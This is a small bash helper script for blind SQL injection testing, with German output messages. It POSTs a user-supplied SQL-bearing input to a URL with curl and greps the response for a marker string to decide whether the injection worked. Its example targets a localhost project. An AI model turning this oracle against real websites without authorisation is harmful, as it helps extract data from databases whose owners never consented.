#!/bin/bash

URL=$1
SQL=$2
GREPFOR=$3

if [ -z "$GREPFOR" ]; then
	echo "Usage: ./blindsqlinjection.bash <URL> <INPUT with SQL> <GREP FOR, like 'Super'>\n";
	echo "Example: ./blindsqlinjection.bash localhost/workspace/UnitSystem/htdocs 'variety=lagrein' 'Super'";
	exit;
fi
echo "curl --silent  --data "$SQL" $URL | grep "$GREPFOR" | wc -l "
if [ $(curl --silent  --data "$SQL" $URL | grep "$GREPFOR" | wc -l ) -gt 0 ]; then 
	echo "Injection erfolgreich"; 
else 
	echo "Injection nicht erfolgreich";
fi
